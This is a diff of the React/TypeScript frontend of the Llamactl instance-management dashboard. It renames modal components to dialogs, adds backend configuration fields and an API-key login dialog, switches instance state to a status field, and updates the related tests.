const health = useInstanceHealth(instance.name, instance.running); const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => { const handleStart = () => {
startInstance(instance.name); startInstance(instance.name);
@@ -50,13 +50,15 @@ function InstanceCard({
setIsLogsOpen(true); setIsLogsOpen(true);
}; };
const running = instance.status === "running";
return ( return (
<> <>
<Card> <Card>
<CardHeader className="pb-3"> <CardHeader className="pb-3">
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle> <CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />} {running && <HealthBadge health={health} />}
</div> </div>
</CardHeader> </CardHeader>
@@ -66,7 +68,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStart} onClick={handleStart}
disabled={instance.running} disabled={running}
title="Start instance" title="Start instance"
data-testid="start-instance-button" data-testid="start-instance-button"
> >
@@ -77,7 +79,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStop} onClick={handleStop}
disabled={!instance.running} disabled={!running}
title="Stop instance" title="Stop instance"
data-testid="stop-instance-button" data-testid="stop-instance-button"
> >
@@ -108,7 +110,7 @@ function InstanceCard({
size="sm" size="sm"
variant="destructive" variant="destructive"
onClick={handleDelete} onClick={handleDelete}
disabled={instance.running} disabled={running}
title="Delete instance" title="Delete instance"
data-testid="delete-instance-button" data-testid="delete-instance-button"
> >
@@ -118,11 +120,11 @@ function InstanceCard({
</CardContent> </CardContent>
</Card> </Card>
<LogsModal <LogsDialog
open={isLogsOpen} open={isLogsOpen}
onOpenChange={setIsLogsOpen} onOpenChange={setIsLogsOpen}
instanceName={instance.name} instanceName={instance.name}
isRunning={instance.running} isRunning={running}
/> />
</> </>
); );

View File

@@ -10,26 +10,26 @@ import {
DialogHeader, DialogHeader,
DialogTitle, DialogTitle,
} from "@/components/ui/dialog"; } from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance"; import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils"; import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react"; import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField"; import ZodFormField from "@/components/ZodFormField";
import BackendFormField from "@/components/BackendFormField";
interface InstanceModalProps { interface InstanceDialogProps {
open: boolean; open: boolean;
onOpenChange: (open: boolean) => void; onOpenChange: (open: boolean) => void;
onSave: (name: string, options: CreateInstanceOptions) => void; onSave: (name: string, options: CreateInstanceOptions) => void;
instance?: Instance; // For editing existing instance instance?: Instance; // For editing existing instance
} }
const InstanceModal: React.FC<InstanceModalProps> = ({ const InstanceDialog: React.FC<InstanceDialogProps> = ({
open, open,
onOpenChange, onOpenChange,
onSave, onSave,
instance, instance,
}) => { }) => {
const isEditing = !!instance; const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState(""); const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({}); const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,8 +39,10 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
// Get field lists dynamically from the type // Get field lists dynamically from the type
const basicFields = getBasicFields(); const basicFields = getBasicFields();
const advancedFields = getAdvancedFields(); const advancedFields = getAdvancedFields();
const basicBackendFields = getBasicBackendFields();
const advancedBackendFields = getAdvancedBackendFields();
// Reset form when modal opens/closes or when instance changes // Reset form when dialog opens/closes or when instance changes
useEffect(() => { useEffect(() => {
if (open) { if (open) {
if (instance) { if (instance) {
@@ -52,6 +54,8 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
setInstanceName(""); setInstanceName("");
setFormData({ setFormData({
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
}); });
} }
setShowAdvanced(false); // Always start with basic view setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
})); }));
}; };
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
},
}));
};
const handleNameChange = (name: string) => { const handleNameChange = (name: string) => {
setInstanceName(name); setInstanceName(name);
// Validate instance name // Validate instance name
@@ -90,7 +104,24 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
// Clean up undefined values to avoid sending empty fields // Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {}; const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => { Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) { if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays // Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) { if (Array.isArray(value) && value.length === 0) {
return; return;
@@ -114,6 +145,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
// Check if auto_restart is enabled // Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true; const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return ( return (
<Dialog open={open} onOpenChange={onOpenChange}> <Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col"> <DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
(fieldKey) => (fieldKey) =>
fieldKey !== "auto_restart" && fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" && fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay" fieldKey !== "restart_delay" &&
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above fieldKey !== "backend_options" // backend_options is handled separately
)
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
))} ))}
</div> </div>
{/* Backend Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */} {/* Advanced Fields Toggle */}
<div className="border-t pt-4"> <div className="border-t pt-4">
<Button <Button
@@ -217,8 +274,8 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
{ {
advancedFields.filter( advancedFields.filter(
(f) => (f) =>
!["max_restarts", "restart_delay"].includes(f as string) !["max_restarts", "restart_delay", "backend_options"].includes(f as string)
).length ).length + advancedBackendFields.length
}{" "} }{" "}
options) options)
</span> </span>
@@ -228,24 +285,51 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
{/* Advanced Fields - Automatically generated from type (excluding restart options) */} {/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && ( {showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted"> <div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4"> {/* Advanced instance fields */}
{advancedFields {advancedFields
.filter( .filter(
(fieldKey) => (fieldKey) =>
!["max_restarts", "restart_delay"].includes( !["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string fieldKey as string
) )
) // Exclude restart options as they're handled above ).length > 0 && (
.sort() <div className="space-y-4">
.map((fieldKey) => ( <h4 className="text-md font-medium">Advanced Instance Configuration</h4>
<ZodFormField {advancedFields
key={fieldKey} .filter(
fieldKey={fieldKey} (fieldKey) =>
value={formData[fieldKey]} !["max_restarts", "restart_delay", "backend_options"].includes(
onChange={handleFieldChange} fieldKey as string
/> )
))} )
</div> .sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div> </div>
)} )}
</div> </div>
@@ -255,20 +339,16 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
<Button <Button
variant="outline" variant="outline"
onClick={handleCancel} onClick={handleCancel}
data-testid="modal-cancel-button" data-testid="dialog-cancel-button"
> >
Cancel Cancel
</Button> </Button>
<Button <Button
onClick={handleSave} onClick={handleSave}
disabled={!instanceName.trim() || !!nameError} disabled={!instanceName.trim() || !!nameError}
data-testid="modal-save-button" data-testid="dialog-save-button"
> >
{isEditing {saveButtonLabel}
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
</Button> </Button>
</DialogFooter> </DialogFooter>
</DialogContent> </DialogContent>
@@ -276,4 +356,4 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
); );
}; };
export default InstanceModal; export default InstanceDialog;

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return ( return (
<div className="flex items-center justify-center py-12" aria-label="Loading"> <div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center"> <div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div> <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p> <p className="text-muted-foreground">Loading instances...</p>
</div> </div>
</div> </div>
) )
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) { if (error) {
return ( return (
<div className="text-center py-12"> <div className="text-center py-12">
<div className="text-red-600 mb-4"> <div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p> <p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p> <p className="text-sm">{error}</p>
</div> </div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) { if (instances.length === 0) {
return ( return (
<div className="text-center py-12"> <div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p> <p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p> <p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div> </div>
) )
} }
return ( return (
<div className="space-y-4"> <div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6"> <h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length}) Instances ({instances.length})
</h2> </h2>

View File

@@ -11,6 +11,7 @@ import {
DialogTitle, DialogTitle,
} from '@/components/ui/dialog' } from '@/components/ui/dialog'
import { Badge } from '@/components/ui/badge' import { Badge } from '@/components/ui/badge'
import { instancesApi } from '@/lib/api'
import { import {
RefreshCw, RefreshCw,
Download, Download,
@@ -21,14 +22,14 @@ import {
Settings Settings
} from 'lucide-react' } from 'lucide-react'
interface LogsModalProps { interface LogsDialogProps {
open: boolean open: boolean
onOpenChange: (open: boolean) => void onOpenChange: (open: boolean) => void
instanceName: string instanceName: string
isRunning: boolean isRunning: boolean
} }
const LogsModal: React.FC<LogsModalProps> = ({ const LogsDialog: React.FC<LogsDialogProps> = ({
open, open,
onOpenChange, onOpenChange,
instanceName, instanceName,
@@ -46,48 +47,44 @@ const LogsModal: React.FC<LogsModalProps> = ({
const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null) const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)
// Fetch logs function // Fetch logs function
const fetchLogs = async (lines?: number) => { const fetchLogs = React.useCallback(
if (!instanceName) return async (lines?: number) => {
if (!instanceName) return
setLoading(true)
setError(null)
try {
const params = lines ? `?lines=${lines}` : ''
const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
if (!response.ok) { setLoading(true)
throw new Error(`Failed to fetch logs: ${response.status}`) setError(null)
try {
const logText = await instancesApi.getLogs(instanceName, lines)
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
} }
},
const logText = await response.text() [instanceName]
setLogs(logText) )
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
}
// Initial load when modal opens // Initial load when dialog opens
useEffect(() => { useEffect(() => {
if (open && instanceName) { if (open && instanceName) {
fetchLogs(lineCount) void fetchLogs(lineCount)
} }
}, [open, instanceName]) }, [open, instanceName, fetchLogs, lineCount])
// Auto-refresh effect // Auto-refresh effect
useEffect(() => { useEffect(() => {
if (autoRefresh && isRunning && open) { if (autoRefresh && isRunning && open) {
refreshIntervalRef.current = setInterval(() => { refreshIntervalRef.current = setInterval(() => {
fetchLogs(lineCount) void fetchLogs(lineCount)
}, 2000) // Refresh every 2 seconds }, 2000) // Refresh every 2 seconds
} else { } else {
if (refreshIntervalRef.current) { if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
clearInterval(refreshIntervalRef.current) clearInterval(refreshIntervalRef.current)
} }
} }
}, [autoRefresh, isRunning, open, lineCount]) }, [autoRefresh, isRunning, open, lineCount, fetchLogs])
// Copy logs to clipboard // Copy logs to clipboard
const copyLogs = async () => { const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
// Apply new line count // Apply new line count
const applyLineCount = () => { const applyLineCount = () => {
fetchLogs(lineCount) void fetchLogs(lineCount)
setShowSettings(false) setShowSettings(false)
} }
@@ -198,7 +195,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
<Button <Button
variant="outline" variant="outline"
size="sm" size="sm"
onClick={() => fetchLogs(lineCount)} onClick={() => void fetchLogs(lineCount)}
disabled={loading} disabled={loading}
> >
{loading ? ( {loading ? (
@@ -290,7 +287,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
<div className="flex items-center gap-2 w-full"> <div className="flex items-center gap-2 w-full">
<Button <Button
variant="outline" variant="outline"
onClick={copyLogs} onClick={() => void copyLogs()}
disabled={!logs} disabled={!logs}
> >
{copied ? ( {copied ? (
@@ -327,4 +324,4 @@ const LogsModal: React.FC<LogsModalProps> = ({
) )
} }
export default LogsModal export default LogsDialog

View File

@@ -0,0 +1,151 @@
import React, { useState, useEffect } from 'react'
import { Button } from '@/components/ui/button'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import {
Dialog,
DialogContent,
DialogDescription,
DialogFooter,
DialogHeader,
DialogTitle,
} from '@/components/ui/dialog'
import { AlertCircle, Key, Loader2 } from 'lucide-react'
import { useAuth } from '@/contexts/AuthContext'
interface LoginDialogProps {
open: boolean
onOpenChange?: (open: boolean) => void
}
const LoginDialog: React.FC<LoginDialogProps> = ({
open,
onOpenChange,
}) => {
const { login, isLoading, error, clearError } = useAuth()
const [apiKey, setApiKey] = useState('')
const [localLoading, setLocalLoading] = useState(false)
// Clear form and errors when dialog opens/closes
useEffect(() => {
if (open) {
setApiKey('')
clearError()
}
}, [open, clearError])
// Clear error when user starts typing
useEffect(() => {
if (error && apiKey) {
clearError()
}
}, [apiKey, error, clearError])
const handleSubmit = async (e: React.FormEvent) => {
e.preventDefault()
if (!apiKey.trim()) {
return
}
setLocalLoading(true)
try {
await login(apiKey.trim())
// Login successful - dialog will close automatically when auth state changes
setApiKey('')
} catch (err) {
// Error is handled by the AuthContext
console.error('Login failed:', err)
} finally {
setLocalLoading(false)
}
}
const handleKeyDown = (e: React.KeyboardEvent<HTMLInputElement>) => {
if (e.key === 'Enter' && !isSubmitDisabled) {
// Create a synthetic FormEvent to satisfy handleSubmit's type
const syntheticEvent = {
preventDefault: () => {},
} as React.FormEvent<HTMLFormElement>;
void handleSubmit(syntheticEvent)
}
}
const isSubmitDisabled = !apiKey.trim() || isLoading || localLoading
return (
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent
className="sm:max-w-md"
showCloseButton={false} // Prevent closing without auth
>
<DialogHeader>
<DialogTitle className="flex items-center gap-2">
<Key className="h-5 w-5" />
Authentication Required
</DialogTitle>
<DialogDescription>
Please enter your management API key to access the Llamactl dashboard.
</DialogDescription>
</DialogHeader>
<form onSubmit={(e) => { void handleSubmit(e) }}>
<div className="grid gap-4 py-4">
{/* Error Display */}
{error && (
<div className="flex items-center gap-2 p-3 bg-destructive/10 border border-destructive/20 rounded-lg">
<AlertCircle className="h-4 w-4 text-destructive flex-shrink-0" />
<span className="text-sm text-destructive">{error}</span>
</div>
)}
{/* API Key Input */}
<div className="grid gap-2">
<Label htmlFor="apiKey">
Management API Key <span className="text-red-500">*</span>
</Label>
<Input
id="apiKey"
type="password"
value={apiKey}
onChange={(e) => setApiKey(e.target.value)}
onKeyDown={handleKeyDown}
placeholder="sk-management-..."
disabled={isLoading || localLoading}
className={error ? "border-red-500" : ""}
autoFocus
autoComplete="off"
/>
<p className="text-sm text-muted-foreground">
Your management API key is required to access instance management features.
</p>
</div>
</div>
<DialogFooter className="flex gap-2">
<Button
type="submit"
disabled={isSubmitDisabled}
data-testid="login-submit-button"
>
{(isLoading || localLoading) ? (
<>
<Loader2 className="h-4 w-4 animate-spin" />
Authenticating...
</>
) : (
<>
<Key className="h-4 w-4" />
Login
</>
)}
</Button>
</DialogFooter>
</form>
</DialogContent>
</Dialog>
)
}
export default LoginDialog

View File

@@ -19,6 +19,15 @@ import {
} from 'lucide-react' } from 'lucide-react'
import { serverApi } from '@/lib/api' import { serverApi } from '@/lib/api'
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoModalProps { interface SystemInfoModalProps {
open: boolean open: boolean
onOpenChange: (open: boolean) => void onOpenChange: (open: boolean) => void
@@ -30,7 +39,7 @@ interface SystemInfo {
help: string help: string
} }
const SystemInfoModal: React.FC<SystemInfoModalProps> = ({ const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
open, open,
onOpenChange onOpenChange
}) => { }) => {
@@ -59,7 +68,7 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
} }
} }
// Load data when modal opens // Load data when dialog opens
useEffect(() => { useEffect(() => {
if (open) { if (open) {
fetchSystemInfo() fetchSystemInfo()
@@ -109,9 +118,20 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
</div> </div>
) : systemInfo ? ( ) : systemInfo ? (
<div className="space-y-6"> <div className="space-y-6">
{/* Version Section */} {/* Llamactl Version Section */}
<div className="space-y-3"> <div className="space-y-3">
<h3 className="font-semibold">Version</h3> <h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Llama Server Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4"> <div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2"> <div className="mb-2">
@@ -180,4 +200,4 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
) )
} }
export default SystemInfoModal export default SystemInfoDialog

View File

@@ -3,12 +3,13 @@ import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label' import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox' import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance' import type { CreateInstanceOptions } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils' import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps { interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions fieldKey: keyof CreateInstanceOptions
value: any value: string | number | boolean | string[] | undefined
onChange: (key: keyof CreateInstanceOptions, value: any) => void onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
} }
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => { const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,18 +19,42 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
// Get type from Zod schema // Get type from Zod schema
const fieldType = getFieldType(fieldKey) const fieldType = getFieldType(fieldKey)
const handleChange = (newValue: any) => { const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey, newValue) onChange(fieldKey, newValue)
} }
const renderField = () => { const renderField = () => {
// Special handling for backend_type field - render as dropdown
if (fieldKey === 'backend_type') {
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<select
id={fieldKey}
value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
onChange={(e) => handleChange(e.target.value || undefined)}
className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
>
<option value={BackendType.LLAMA_CPP}>Llama Server</option>
{/* Add more backend types here as they become available */}
</select>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
switch (fieldType) { switch (fieldType) {
case 'boolean': case 'boolean':
return ( return (
<div className="flex items-center space-x-2"> <div className="flex items-center space-x-2">
<Checkbox <Checkbox
id={fieldKey} id={fieldKey}
checked={value || false} checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)} onCheckedChange={(checked) => handleChange(checked)}
/> />
<Label htmlFor={fieldKey} className="text-sm font-normal"> <Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +76,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input <Input
id={fieldKey} id={fieldKey}
type="number" type="number"
value={value || ''} step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => { onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined const numValue = e.target.value ? parseFloat(e.target.value) : undefined
handleChange(numValue) // Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}} }}
placeholder={config.placeholder} placeholder={config.placeholder}
/> />
@@ -101,7 +130,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input <Input
id={fieldKey} id={fieldKey}
type="text" type="text"
value={value || ''} value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)} onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder} placeholder={config.placeholder}
/> />

View File

@@ -1,8 +1,9 @@
import { describe, it, expect, vi, beforeEach } from 'vitest' import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen } from '@testing-library/react' import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard' import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here // Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({ vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,19 +18,25 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = { const stoppedInstance: Instance = {
name: 'test-instance', name: 'test-instance',
running: false, status: 'stopped',
options: { model: 'test-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
} }
const runningInstance: Instance = { const runningInstance: Instance = {
name: 'running-instance', name: 'running-instance',
running: true, status: 'running',
options: { model: 'running-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
} }
beforeEach(() => { beforeEach(() => {
vi.clearAllMocks() vi.clearAllMocks()
}) window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
})
afterEach(() => {
vi.restoreAllMocks()
})
describe('Instance Action Buttons', () => { describe('Instance Action Buttons', () => {
it('calls startInstance when start button clicked on stopped instance', async () => { it('calls startInstance when start button clicked on stopped instance', async () => {
@@ -93,7 +100,7 @@ describe('InstanceCard - Instance Actions and State', () => {
expect(mockEditInstance).toHaveBeenCalledWith(stoppedInstance) expect(mockEditInstance).toHaveBeenCalledWith(stoppedInstance)
}) })
it('opens logs modal when logs button clicked', async () => { it('opens logs dialog when logs button clicked', async () => {
const user = userEvent.setup() const user = userEvent.setup()
render( render(
@@ -109,7 +116,7 @@ describe('InstanceCard - Instance Actions and State', () => {
const logsButton = screen.getByTitle('View logs') const logsButton = screen.getByTitle('View logs')
await user.click(logsButton) await user.click(logsButton)
// Should open logs modal (we can verify this by checking if modal title appears) // Should open logs dialog (we can verify this by checking if dialog title appears)
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument() expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
}) })
}) })
@@ -272,19 +279,19 @@ describe('InstanceCard - Instance Actions and State', () => {
/> />
) )
// Open logs modal // Open logs dialog
await user.click(screen.getByTitle('View logs')) await user.click(screen.getByTitle('View logs'))
// Verify modal opened with correct instance data // Verify dialog opened with correct instance data
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument() expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
// Close modal to test close functionality // Close dialog to test close functionality
const closeButtons = screen.getAllByText('Close') const closeButtons = screen.getAllByText('Close')
const modalCloseButton = closeButtons.find(button => const dialogCloseButton = closeButtons.find(button =>
button.closest('[data-slot="dialog-content"]') button.closest('[data-slot="dialog-content"]')
) )
expect(modalCloseButton).toBeTruthy() expect(dialogCloseButton).toBeTruthy()
await user.click(modalCloseButton!) await user.click(dialogCloseButton!)
// Modal should close // Modal should close
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument() expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
@@ -295,7 +302,7 @@ describe('InstanceCard - Instance Actions and State', () => {
it('handles instance with minimal data', () => { it('handles instance with minimal data', () => {
const minimalInstance: Instance = { const minimalInstance: Instance = {
name: 'minimal', name: 'minimal',
running: false, status: 'stopped',
options: {} options: {}
} }
@@ -317,7 +324,7 @@ describe('InstanceCard - Instance Actions and State', () => {
it('handles instance with undefined options', () => { it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = { const instanceWithoutOptions: Instance = {
name: 'no-options', name: 'no-options',
running: true, status: 'running',
options: undefined options: undefined
} }

View File

@@ -1,10 +1,12 @@
import { describe, it, expect, vi, beforeEach } from 'vitest' import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen } from '@testing-library/react' import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import InstanceList from '@/components/InstanceList' import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
vi.mock('@/lib/api', () => ({ vi.mock('@/lib/api', () => ({
@@ -30,27 +32,38 @@ vi.mock('@/lib/healthService', () => ({
function renderInstanceList(editInstance = vi.fn()) { function renderInstanceList(editInstance = vi.fn()) {
return render( return render(
<InstancesProvider> <AuthProvider>
<InstanceList editInstance={editInstance} /> <InstancesProvider>
</InstancesProvider> <InstanceList editInstance={editInstance} />
</InstancesProvider>
</AuthProvider>
) )
} }
describe('InstanceList - State Management and UI Logic', () => { describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn() const mockEditInstance = vi.fn()
